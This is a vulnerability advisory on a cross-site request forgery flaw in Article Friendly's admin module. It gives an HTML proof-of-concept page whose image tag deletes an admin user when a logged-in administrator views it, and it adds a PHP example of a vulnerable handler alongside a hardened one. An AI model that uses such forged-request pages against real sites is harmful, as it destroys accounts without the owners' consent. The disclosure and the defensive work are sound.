Article Friendly - Cross-Site Request Forgery



EKU-ID: 18859 CVE: OSVDB-ID:
Author: pratul agrawal Published: 2010-02-24 Verified: Not Verified


=======================================================================
                   Article friendly CSRF Vulnerability
=======================================================================

                                  by

                            Pratul Agrawal



  # Vulnerability found in: Admin module

  # Email         Pratulag@yahoo.com

  # Company       aksitservices

  # Credit by     Pratul Agrawal

  # Site page     http://www.articlefriendly.com/

  # Platform      PHP



  # Proof of concept   #

  Targeted URL:  http://server/admin/index.php?filename=adminlogin

  The admin user-deletion action (filename=adminuser&a=3&adminid=...) is triggered by a plain GET request and carries no anti-CSRF token, so any page a logged-in administrator views can issue it on their behalf. The following HTML page deletes an admin user through cross-site request forgery:

  ..................................................................................................................

  <html>
    <body>
      <img src="http://server/admin/index.php?filename=adminuser&a=3&adminid=[USER ID]" />
    </body>
  </html>

  ..................................................................................................................



  After an authenticated administrator loads this page, refresh the admin user list: the user with the given ID has been deleted without any confirmation.
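The root cause is a state-changing action reachable by a bare GET that relies on the session cookie alone. The PHP sketch below is an added illustration and is not code from the original advisory or from Article Friendly: it models the reported pattern in a hypothetical delete_user_vulnerable() and then shows a hardened handler that requires POST, a per-session anti-CSRF token compared with hash_equals(), a same-origin check and a SameSite session cookie. The function names, the $deleteUser callback, the host name admin.example and the session layout are this example's own assumptions; the array form of session_set_cookie_params() needs PHP 7.3 or later.

```php
<?php
// Added illustration (not Article Friendly's code). The function names,
// the $deleteUser callback and the session layout are assumptions.

// Cookie flags are set before the session starts: SameSite=Lax keeps the
// session cookie off cross-site subresource loads such as <img> tags.
session_set_cookie_params(['samesite' => 'Lax', 'secure' => true, 'httponly' => true]);
session_start();

// --- The pattern reported above, for contrast ------------------------------
// index.php?filename=adminuser&a=3&adminid=N deletes on any GET that carries
// the admin's session cookie. Nothing in the request proves the admin meant
// it, so an <img> on an unrelated page is enough.
function delete_user_vulnerable(array $query, callable $deleteUser): bool
{
    if (($query['filename'] ?? '') === 'adminuser' && ($query['a'] ?? '') === '3') {
        $deleteUser((int) ($query['adminid'] ?? 0));
        return true;
    }
    return false;
}

// --- Hardened handler ------------------------------------------------------
// One unguessable token per session, embedded as a hidden field in every
// admin form that changes state.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function admin_delete_form(int $adminId): string
{
    $token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="index.php?filename=adminuser">'
         . '<input type="hidden" name="a" value="3">'
         . '<input type="hidden" name="adminid" value="' . $adminId . '">'
         . '<input type="hidden" name="csrf_token" value="' . $token . '">'
         . '<button>Delete</button></form>';
}

// Method, origin and token must all check out before anything is deleted.
function csrf_request_is_valid(string $method, array $headers, array $post, string $expectedHost): bool
{
    // 1. State changes only on POST; <img>, <script> and links can only send GET.
    if ($method !== 'POST') {
        return false;
    }
    // 2. Browsers attach Origin (or at least Referer) to cross-site POSTs.
    //    Compare the parsed host, not a string prefix, so a host such as
    //    "admin.example.attacker.test" does not slip through.
    $origin = $headers['Origin'] ?? $headers['Referer'] ?? '';
    $host   = parse_url($origin, PHP_URL_HOST);
    if (!is_string($host) || strcasecmp($host, $expectedHost) !== 0) {
        return false;
    }
    // 3. The token is known only to the session and the site's own forms, so a
    //    forged page cannot supply it. hash_equals() avoids a timing side channel.
    $token = (string) ($post['csrf_token'] ?? '');
    return $token !== '' && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $token);
}

function delete_user_hardened(string $method, array $headers, array $post,
                              string $expectedHost, callable $deleteUser): bool
{
    if (!csrf_request_is_valid($method, $headers, $post, $expectedHost)) {
        http_response_code(403);
        return false;
    }
    $deleteUser((int) ($post['adminid'] ?? 0));
    unset($_SESSION['csrf_token']);   // rotate the token after a destructive action
    return true;
}

// --- Constructed walk-through (sample values, not real accounts) ------------
$deleted    = [];
$deleteUser = function (int $id) use (&$deleted) { $deleted[] = $id; };

// The forged GET from the advisory's <img> tag reaches the vulnerable handler.
delete_user_vulnerable(['filename' => 'adminuser', 'a' => '3', 'adminid' => '7'], $deleteUser);

// The same forged GET against the hardened handler is refused: no POST, no token.
$forged = delete_user_hardened('GET', ['Referer' => 'https://attacker.test/page'], [],
                               'admin.example', $deleteUser);

// A genuine submission of admin_delete_form() from the site's own origin is accepted.
$genuine = delete_user_hardened('POST', ['Origin' => 'https://admin.example'],
    ['a' => '3', 'adminid' => '8', 'csrf_token' => csrf_token()], 'admin.example', $deleteUser);

var_dump($forged, $genuine, $deleted);
```

Run with `php example.php`: the forged request is rejected by the hardened handler while the tokened POST from the site's own form succeeds, and only the vulnerable handler and the genuine submission appear in the recorded deletions. The three checks are layered on purpose: the POST requirement alone defeats the <img> vector in this advisory, the origin check catches cross-site forms, and the session-bound token covers the cases where a browser omits Origin and Referer.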


# If you have any questions, comments, or concerns, feel free to contact me.